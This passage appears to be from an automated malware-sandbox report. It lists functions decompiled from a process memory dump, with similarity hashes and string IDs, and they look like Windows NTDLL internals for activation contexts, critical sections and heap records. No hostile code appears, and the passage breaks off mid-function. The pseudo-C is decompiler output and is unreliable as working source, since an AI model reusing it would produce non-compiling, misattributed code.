                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 8a5fb735a3d31f9132942b77f55b3b9c576675a930d6aedba31ab77a4428fd9b
                                                              • Instruction ID: ca14e4fdd16c7439f7763d37c1c05a328750590d319476f86225a275e18cb6be
                                                              • Opcode Fuzzy Hash: 8a5fb735a3d31f9132942b77f55b3b9c576675a930d6aedba31ab77a4428fd9b
                                                              • Instruction Fuzzy Hash: 15318DB1508305AFD361DF68C9849AFBBE8EB99654F004A2EF9D483250D739DD04CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 72%
                                                              			E00FF1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                              				intOrPtr _v8;
                                                              				char _v16;
                                                              				intOrPtr* _t26;
                                                              				intOrPtr _t29;
                                                              				void* _t30;
                                                              				signed int _t31;
                                                              
                                                              				_t27 = __ecx;
                                                              				_t29 = __edx;
                                                              				_t31 = 0;
                                                              				_v8 = __edx;
                                                              				if(__edx == 0) {
                                                              					L18:
                                                              					_t30 = 0xc000000d;
                                                              					goto L12;
                                                              				} else {
                                                              					_t26 = _a4;
                                                              					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                              						goto L18;
                                                              					} else {
                                                              						E0102BB40(__ecx,  &_v16, __ecx);
                                                              						_push(_t26);
                                                              						_push(0);
                                                              						_push(0);
                                                              						_push(_t29);
                                                              						_push( &_v16);
                                                              						_t30 = E0102A9B0();
                                                              						if(_t30 >= 0) {
                                                              							_t19 =  *_t26;
                                                              							if( *_t26 != 0) {
                                                              								goto L7;
                                                              							} else {
                                                              								 *_a8 =  *_a8 & 0;
                                                              							}
                                                              						} else {
                                                              							if(_t30 != 0xc0000023) {
                                                              								L9:
                                                              								_push(_t26);
                                                              								_push( *_t26);
                                                              								_push(_t31);
                                                              								_push(_v8);
                                                              								_push( &_v16);
                                                              								_t30 = E0102A9B0();
                                                              								if(_t30 < 0) {
                                                              									L12:
                                                              									if(_t31 != 0) {
                                                              										L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                              									}
                                                              								} else {
                                                              									 *_a8 = _t31;
                                                              								}
                                                              							} else {
                                                              								_t19 =  *_t26;
                                                              								if( *_t26 == 0) {
                                                              									_t31 = 0;
                                                              								} else {
                                                              									L7:
                                                              									_t31 = L01004620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                              								}
                                                              								if(_t31 == 0) {
                                                              									_t30 = 0xc0000017;
                                                              								} else {
                                                              									goto L9;
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t30;
                                                              			}










                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: WindowsExcludedProcs
                                                              • API String ID: 0-3583428290
                                                              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                              • Instruction ID: c783135cc6a4f70489bb8d137e949dc63ce2adf953483c82da9aca5cb66aaaaf
                                                              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                              • Instruction Fuzzy Hash: 7F21F877A4112DEBDB229A598880FEB77ADFF51B60F154465FA84DB210D731DC00E7A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0100F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                              				intOrPtr _t13;
                                                              				intOrPtr _t14;
                                                              				signed int _t16;
                                                              				signed char _t17;
                                                              				intOrPtr _t19;
                                                              				intOrPtr _t21;
                                                              				intOrPtr _t23;
                                                              				intOrPtr* _t25;
                                                              
                                                              				_t25 = _a8;
                                                              				_t17 = __ecx;
                                                              				if(_t25 == 0) {
                                                              					_t19 = 0xc00000f2;
                                                              					L8:
                                                              					return _t19;
                                                              				}
                                                              				if((__ecx & 0xfffffffe) != 0) {
                                                              					_t19 = 0xc00000ef;
                                                              					goto L8;
                                                              				}
                                                              				_t19 = 0;
                                                              				 *_t25 = 0;
                                                              				_t21 = 0;
                                                              				_t23 = "Actx ";
                                                              				if(__edx != 0) {
                                                              					if(__edx == 0xfffffffc) {
                                                              						L21:
                                                              						_t21 = 0x200;
                                                              						L5:
                                                              						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                              						 *_t25 = _t13;
                                                              						L6:
                                                              						if(_t13 == 0) {
                                                              							if((_t17 & 0x00000001) != 0) {
                                                              								 *_t25 = _t23;
                                                              							}
                                                              						}
                                                              						L7:
                                                              						goto L8;
                                                              					}
                                                              					if(__edx == 0xfffffffd) {
                                                              						 *_t25 = _t23;
                                                              						_t13 = _t23;
                                                              						goto L6;
                                                              					}
                                                              					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                              					 *_t25 = _t13;
                                                              					L14:
                                                              					if(_t21 == 0) {
                                                              						goto L6;
                                                              					}
                                                              					goto L5;
                                                              				}
                                                              				_t14 = _a4;
                                                              				if(_t14 != 0) {
                                                              					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                              					if(_t16 <= 1) {
                                                              						_t21 = 0x1f8;
                                                              						_t13 = 0;
                                                              						goto L14;
                                                              					}
                                                              					if(_t16 == 2) {
                                                              						goto L21;
                                                              					}
                                                              					if(_t16 != 4) {
                                                              						_t19 = 0xc00000f0;
                                                              						goto L7;
                                                              					}
                                                              					_t13 = 0;
                                                              					goto L6;
                                                              				} else {
                                                              					_t21 = 0x1f8;
                                                              					goto L5;
                                                              				}
                                                              			}












                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Actx
                                                              • API String ID: 0-89312691
                                                              • Opcode ID: 6f800aa920470f409672c4787bca0eebf62b78b6d28a4c9d6dee61360d902688
                                                              • Instruction ID: 3c3391eab8ead43a6fa658cd2b53713e99f00440e09b966be73b18e317ebbfd1
                                                              • Opcode Fuzzy Hash: 6f800aa920470f409672c4787bca0eebf62b78b6d28a4c9d6dee61360d902688
                                                              • Instruction Fuzzy Hash: 0811BE35304A038BFBB78E1C849073A76D5BB85664F24456AE9E9CB3D1EBB0C841A343
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 71%
                                                              			E01098DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                              				intOrPtr _t35;
                                                              				void* _t41;
                                                              
                                                              				_t40 = __esi;
                                                              				_t39 = __edi;
                                                              				_t38 = __edx;
                                                              				_t35 = __ecx;
                                                              				_t34 = __ebx;
                                                              				_push(0x74);
                                                              				_push(0x10c0d50);
                                                              				E0103D0E8(__ebx, __edi, __esi);
                                                              				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                              				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                              					E01075720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                              					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                              						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                              						asm("int3");
                                                              						 *(_t41 - 4) = 0xfffffffe;
                                                              					}
                                                              				}
                                                              				 *(_t41 - 4) = 1;
                                                              				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                              				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                              				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                              				 *((intOrPtr*)(_t41 - 0x64)) = L0103DEF0;
                                                              				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                              				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                              				_push(_t41 - 0x70);
                                                              				L0103DEF0(1, _t38);
                                                              				 *(_t41 - 4) = 0xfffffffe;
                                                              				return E0103D130(_t34, _t39, _t40);
                                                              			}






                                                              Strings
                                                              • Critical error detected %lx, xrefs: 01098E21
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Critical error detected %lx
                                                              • API String ID: 0-802127002
                                                              • Opcode ID: 5ab0c902ab245237089116c36910934d714bf62af4af8a6a366dae40a0dc16cb
                                                              • Instruction ID: 64696c56d821fdeb713962ba62a81f2dca78ba59eaf1ba9eb00c9498db4c34ac
                                                              • Opcode Fuzzy Hash: 5ab0c902ab245237089116c36910934d714bf62af4af8a6a366dae40a0dc16cb
                                                              • Instruction Fuzzy Hash: 8F1175B5D00348EADF24DFA889157DCBBB4BB05311F20825EE1A9AB392C3340602DF14
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0107FF60
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                              • API String ID: 0-1911121157
                                                              • Opcode ID: 19b5ba5023f264acee345f1e57d1259effdb8842f890f26b7368e843a687d5b7
                                                              • Instruction ID: 22e82df3c7b1381ea6e4eb39bbf7a8bc22f609627ef3b63b6ed7ea72e4f0cb2c
                                                              • Opcode Fuzzy Hash: 19b5ba5023f264acee345f1e57d1259effdb8842f890f26b7368e843a687d5b7
                                                              • Instruction Fuzzy Hash: C4110475910545EFDB22EB54CC48FD8BBF2FF04714F548084F5885B2A1CB399940DB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 88%
                                                              			E010B5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                              				signed int _t296;
                                                              				signed char _t298;
                                                              				signed int _t301;
                                                              				signed int _t306;
                                                              				signed int _t310;
                                                              				signed char _t311;
                                                              				intOrPtr _t312;
                                                              				signed int _t313;
                                                              				void* _t327;
                                                              				signed int _t328;
                                                              				intOrPtr _t329;
                                                              				intOrPtr _t333;
                                                              				signed char _t334;
                                                              				signed int _t336;
                                                              				void* _t339;
                                                              				signed int _t340;
                                                              				signed int _t356;
                                                              				signed int _t362;
                                                              				short _t367;
                                                              				short _t368;
                                                              				short _t373;
                                                              				signed int _t380;
                                                              				void* _t382;
                                                              				short _t385;
                                                              				signed short _t392;
                                                              				signed char _t393;
                                                              				signed int _t395;
                                                              				signed char _t397;
                                                              				signed int _t398;
                                                              				signed short _t402;
                                                              				void* _t406;
                                                              				signed int _t412;
                                                              				signed char _t414;
                                                              				signed short _t416;
                                                              				signed int _t421;
                                                              				signed char _t427;
                                                              				intOrPtr _t434;
                                                              				signed char _t435;
                                                              				signed int _t436;
                                                              				signed int _t442;
                                                              				signed int _t446;
                                                              				signed int _t447;
                                                              				signed int _t451;
                                                              				signed int _t453;
                                                              				signed int _t454;
                                                              				signed int _t455;
                                                              				intOrPtr _t456;
                                                              				intOrPtr* _t457;
                                                              				short _t458;
                                                              				signed short _t462;
                                                              				signed int _t469;
                                                              				intOrPtr* _t474;
                                                              				signed int _t475;
                                                              				signed int _t479;
                                                              				signed int _t480;
                                                              				signed int _t481;
                                                              				short _t485;
                                                              				signed int _t491;
                                                              				signed int* _t494;
                                                              				signed int _t498;
                                                              				signed int _t505;
                                                              				intOrPtr _t506;
                                                              				signed short _t508;
                                                              				signed int _t511;
                                                              				void* _t517;
                                                              				signed int _t519;
                                                              				signed int _t522;
                                                              				void* _t523;
                                                              				signed int _t524;
                                                              				void* _t528;
                                                              				signed int _t529;
                                                              
                                                              				_push(0xd4);
                                                              				_push(0x10c1178);
                                                              				E0103D0E8(__ebx, __edi, __esi);
                                                              				_t494 = __edx;
                                                              				 *(_t528 - 0xcc) = __edx;
                                                              				_t511 = __ecx;
                                                              				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                              				 *(_t528 - 0xbc) = __ecx;
                                                              				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                              				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                              				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                              				_t427 = 0;
                                                              				 *(_t528 - 0x74) = 0;
                                                              				 *(_t528 - 0x9c) = 0;
                                                              				 *(_t528 - 0x84) = 0;
                                                              				 *(_t528 - 0xac) = 0;
                                                              				 *(_t528 - 0x88) = 0;
                                                              				 *(_t528 - 0xa8) = 0;
                                                              				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                              				if( *(_t528 + 0x1c) <= 0x80) {
                                                              					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                              					if(__eflags != 0) {
                                                              						_t421 = E010B4C56(0, __edx, __ecx, __eflags);
                                                              						__eflags = _t421;
                                                              						if(_t421 != 0) {
                                                              							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                              							E0102D000(0x410);
                                                              							 *(_t528 - 0x18) = _t529;
                                                              							 *(_t528 - 0x9c) = _t529;
                                                              							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                              							E010B5542(_t528 - 0x9c, _t528 - 0x84);
                                                              						}
                                                              					}
                                                              					_t435 = _t427;
                                                              					 *(_t528 - 0xd0) = _t435;
                                                              					_t474 = _t511 + 0x65;
                                                              					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                              					_t511 = 0x18;
                                                              					while(1) {
                                                              						 *(_t528 - 0xa0) = _t427;
                                                              						 *(_t528 - 0xbc) = _t427;
                                                              						 *(_t528 - 0x80) = _t427;
                                                              						 *(_t528 - 0x78) = 0x50;
                                                              						 *(_t528 - 0x79) = _t427;
                                                              						 *(_t528 - 0x7a) = _t427;
                                                              						 *(_t528 - 0x8c) = _t427;
                                                              						 *(_t528 - 0x98) = _t427;
                                                              						 *(_t528 - 0x90) = _t427;
                                                              						 *(_t528 - 0xb0) = _t427;
                                                              						 *(_t528 - 0xb8) = _t427;
                                                              						_t296 = 1 << _t435;
                                                              						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                              						__eflags = _t436 & _t296;
                                                              						if((_t436 & _t296) != 0) {
                                                              							goto L92;
                                                              						}
                                                              						__eflags =  *((char*)(_t474 - 1));
                                                              						if( *((char*)(_t474 - 1)) == 0) {
                                                              							goto L92;
                                                              						}
                                                              						_t301 =  *_t474;
                                                              						__eflags = _t494[1] - _t301;
                                                              						if(_t494[1] <= _t301) {
                                                              							L10:
                                                              							__eflags =  *(_t474 - 5) & 0x00000040;
                                                              							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                              								L12:
                                                              								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                              								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                              									goto L92;
                                                              								}
                                                              								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                              								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                              								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                              									goto L92;
                                                              								}
                                                              								__eflags = _t442 -  *(_t474 - 0x11);
                                                              								if(_t442 !=  *(_t474 - 0x11)) {
                                                              									goto L92;
                                                              								}
                                                              								L15:
                                                              								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                              								 *(_t528 - 0xc0) = _t306;
                                                              								 *(_t528 - 0xa4) = _t306;
                                                              								__eflags =  *0x10d60e8;
                                                              								if( *0x10d60e8 != 0) {
                                                              									__eflags = _t306 - 0x40;
                                                              									if(_t306 < 0x40) {
                                                              										L20:
                                                              										asm("lock inc dword [eax]");
                                                              										_t310 =  *0x10d60e8; // 0x0
                                                              										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                              										__eflags = _t311 & 0x00000001;
                                                              										if((_t311 & 0x00000001) == 0) {
                                                              											 *(_t528 - 0xa0) = _t311;
                                                              											_t475 = _t427;
                                                              											 *(_t528 - 0x74) = _t427;
                                                              											__eflags = _t475;
                                                              											if(_t475 != 0) {
                                                              												L91:
                                                              												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                              												goto L92;
                                                              											}
                                                              											asm("sbb edi, edi");
                                                              											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                              											_t511 = _t498;
                                                              											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                              											__eflags =  *(_t312 - 5) & 1;
                                                              											if(( *(_t312 - 5) & 1) != 0) {
                                                              												_push(_t528 - 0x98);
                                                              												_push(0x4c);
                                                              												_push(_t528 - 0x70);
                                                              												_push(1);
                                                              												_push(0xfffffffa);
                                                              												_t412 = E01029710();
                                                              												_t475 = _t427;
                                                              												__eflags = _t412;
                                                              												if(_t412 >= 0) {
                                                              													_t414 =  *(_t528 - 0x98) - 8;
                                                              													 *(_t528 - 0x98) = _t414;
                                                              													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                              													 *(_t528 - 0x8c) = _t416;
                                                              													 *(_t528 - 0x79) = 1;
                                                              													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                              													__eflags = _t511;
                                                              												}
                                                              											}
                                                              											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                              											__eflags = _t446 & 0x00000004;
                                                              											if((_t446 & 0x00000004) != 0) {
                                                              												__eflags =  *(_t528 - 0x9c);
                                                              												if( *(_t528 - 0x9c) != 0) {
                                                              													 *(_t528 - 0x7a) = 1;
                                                              													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                              													__eflags = _t511;
                                                              												}
                                                              											}
                                                              											_t313 = 2;
                                                              											_t447 = _t446 & _t313;
                                                              											__eflags = _t447;
                                                              											 *(_t528 - 0xd4) = _t447;
                                                              											if(_t447 != 0) {
                                                              												_t406 = 0x10;
                                                              												_t511 = _t511 + _t406;
                                                              												__eflags = _t511;
                                                              											}
                                                              											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                              											 *(_t528 - 0x88) = _t427;
                                                              											__eflags =  *(_t528 + 0x1c);
                                                              											if( *(_t528 + 0x1c) <= 0) {
                                                              												L45:
                                                              												__eflags =  *(_t528 - 0xb0);
                                                              												if( *(_t528 - 0xb0) != 0) {
                                                              													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                              													__eflags = _t511;
                                                              												}
                                                              												__eflags = _t475;
                                                              												if(_t475 != 0) {
                                                              													asm("lock dec dword [ecx+edx*8+0x4]");
                                                              													goto L100;
                                                              												} else {
                                                              													_t494[3] = _t511;
                                                              													_t451 =  *(_t528 - 0xa0);
                                                              													_t427 = E01026DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                              													 *(_t528 - 0x88) = _t427;
                                                              													__eflags = _t427;
                                                              													if(_t427 == 0) {
                                                              														__eflags = _t511 - 0xfff8;
                                                              														if(_t511 <= 0xfff8) {
                                                              															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                              															asm("sbb ecx, ecx");
                                                              															__eflags = (_t451 & 0x000000e2) + 8;
                                                              														}
                                                              														asm("lock dec dword [eax+edx*8+0x4]");
                                                              														L100:
                                                              														goto L101;
                                                              													}
                                                              													_t453 =  *(_t528 - 0xa0);
                                                              													 *_t494 = _t453;
                                                              													_t494[1] = _t427;
                                                              													_t494[2] =  *(_t528 - 0xbc);
                                                              													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                              													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                              													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                              													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													__eflags =  *(_t528 + 0x14);
                                                              													if( *(_t528 + 0x14) == 0) {
                                                              														__eflags =  *[fs:0x18] + 0xf50;
                                                              													}
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													__eflags =  *(_t528 + 0x18);
                                                              													if( *(_t528 + 0x18) == 0) {
                                                              														_t454 =  *(_t528 - 0x80);
                                                              														_t479 =  *(_t528 - 0x78);
                                                              														_t327 = 1;
                                                              														__eflags = 1;
                                                              													} else {
                                                              														_t146 = _t427 + 0x50; // 0x50
                                                              														_t454 = _t146;
                                                              														 *(_t528 - 0x80) = _t454;
                                                              														_t382 = 0x18;
                                                              														 *_t454 = _t382;
                                                              														 *((short*)(_t454 + 2)) = 1;
                                                              														_t385 = 0x10;
                                                              														 *((short*)(_t454 + 6)) = _t385;
                                                              														 *(_t454 + 4) = 0;
                                                              														asm("movsd");
                                                              														asm("movsd");
                                                              														asm("movsd");
                                                              														asm("movsd");
                                                              														_t327 = 1;
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t479 = 0x68;
                                                              														 *(_t528 - 0x78) = _t479;
                                                              													}
                                                              													__eflags =  *(_t528 - 0x79) - _t327;
                                                              													if( *(_t528 - 0x79) == _t327) {
                                                              														_t524 = _t479 + _t427;
                                                              														_t508 =  *(_t528 - 0x8c);
                                                              														 *_t524 = _t508;
                                                              														_t373 = 2;
                                                              														 *((short*)(_t524 + 2)) = _t373;
                                                              														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                              														 *((short*)(_t524 + 4)) = 0;
                                                              														_t167 = _t524 + 8; // 0x8
                                                              														E0102F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                              														_t529 = _t529 + 0xc;
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                              														 *(_t528 - 0x78) = _t479;
                                                              														_t380 =  *(_t528 - 0x80);
                                                              														__eflags = _t380;
                                                              														if(_t380 != 0) {
                                                              															_t173 = _t380 + 4;
                                                              															 *_t173 =  *(_t380 + 4) | 1;
                                                              															__eflags =  *_t173;
                                                              														}
                                                              														_t454 = _t524;
                                                              														 *(_t528 - 0x80) = _t454;
                                                              														_t327 = 1;
                                                              														__eflags = 1;
                                                              													}
                                                              													__eflags =  *(_t528 - 0xd4);
                                                              													if( *(_t528 - 0xd4) == 0) {
                                                              														_t505 =  *(_t528 - 0x80);
                                                              													} else {
                                                              														_t505 = _t479 + _t427;
                                                              														_t523 = 0x10;
                                                              														 *_t505 = _t523;
                                                              														_t367 = 3;
                                                              														 *((short*)(_t505 + 2)) = _t367;
                                                              														_t368 = 4;
                                                              														 *((short*)(_t505 + 6)) = _t368;
                                                              														 *(_t505 + 4) = 0;
                                                              														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                              														_t327 = 1;
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t479 = _t479 + _t523;
                                                              														 *(_t528 - 0x78) = _t479;
                                                              														__eflags = _t454;
                                                              														if(_t454 != 0) {
                                                              															_t186 = _t454 + 4;
                                                              															 *_t186 =  *(_t454 + 4) | 1;
                                                              															__eflags =  *_t186;
                                                              														}
                                                              														 *(_t528 - 0x80) = _t505;
                                                              													}
                                                              													__eflags =  *(_t528 - 0x7a) - _t327;
                                                              													if( *(_t528 - 0x7a) == _t327) {
                                                              														 *(_t528 - 0xd4) = _t479 + _t427;
                                                              														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                              														E0102F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                              														_t529 = _t529 + 0xc;
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t479 =  *(_t528 - 0x78) + _t522;
                                                              														 *(_t528 - 0x78) = _t479;
                                                              														__eflags = _t505;
                                                              														if(_t505 != 0) {
                                                              															_t199 = _t505 + 4;
                                                              															 *_t199 =  *(_t505 + 4) | 1;
                                                              															__eflags =  *_t199;
                                                              														}
                                                              														_t505 =  *(_t528 - 0xd4);
                                                              														 *(_t528 - 0x80) = _t505;
                                                              													}
                                                              													__eflags =  *(_t528 - 0xa8);
                                                              													if( *(_t528 - 0xa8) != 0) {
                                                              														_t356 = _t479 + _t427;
                                                              														 *(_t528 - 0xd4) = _t356;
                                                              														_t462 =  *(_t528 - 0xac);
                                                              														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                              														_t485 = 0xc;
                                                              														 *((short*)(_t356 + 2)) = _t485;
                                                              														 *(_t356 + 6) = _t462;
                                                              														 *((short*)(_t356 + 4)) = 0;
                                                              														_t211 = _t356 + 8; // 0x9
                                                              														E0102F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                              														E0102FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                              														_t529 = _t529 + 0x18;
                                                              														_t427 =  *(_t528 - 0x88);
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t505 =  *(_t528 - 0xd4);
                                                              														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                              														 *(_t528 - 0x78) = _t479;
                                                              														_t362 =  *(_t528 - 0x80);
                                                              														__eflags = _t362;
                                                              														if(_t362 != 0) {
                                                              															_t222 = _t362 + 4;
                                                              															 *_t222 =  *(_t362 + 4) | 1;
                                                              															__eflags =  *_t222;
                                                              														}
                                                              													}
                                                              													__eflags =  *(_t528 - 0xb0);
                                                              													if( *(_t528 - 0xb0) != 0) {
                                                              														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                              														_t458 = 0xb;
                                                              														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                              														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                              														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                              														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                              														E0102FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                              														_t529 = _t529 + 0xc;
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                              														 *(_t528 - 0x78) = _t479;
                                                              														__eflags = _t505;
                                                              														if(_t505 != 0) {
                                                              															_t241 = _t505 + 4;
                                                              															 *_t241 =  *(_t505 + 4) | 1;
                                                              															__eflags =  *_t241;
                                                              														}
                                                              													}
                                                              													_t328 =  *(_t528 + 0x1c);
                                                              													__eflags = _t328;
                                                              													if(_t328 == 0) {
                                                              														L87:
                                                              														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                              														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                              														_t455 =  *(_t528 - 0xdc);
                                                              														 *(_t427 + 0x14) = _t455;
                                                              														_t480 =  *(_t528 - 0xa0);
                                                              														_t517 = 3;
                                                              														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                              														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                              															asm("rdtsc");
                                                              															 *(_t427 + 0x3c) = _t480;
                                                              														} else {
                                                              															 *(_t427 + 0x3c) = _t455;
                                                              														}
                                                              														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                              														_t456 =  *[fs:0x18];
                                                              														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                              														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                              														_t427 = 0;
                                                              														__eflags = 0;
                                                              														_t511 = 0x18;
                                                              														goto L91;
                                                              													} else {
                                                              														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                              														__eflags = _t519;
                                                              														 *(_t528 - 0x8c) = _t328;
                                                              														do {
                                                              															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                              															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                              															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                              															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                              															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                              															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                              																_t334 =  *_t519;
                                                              															} else {
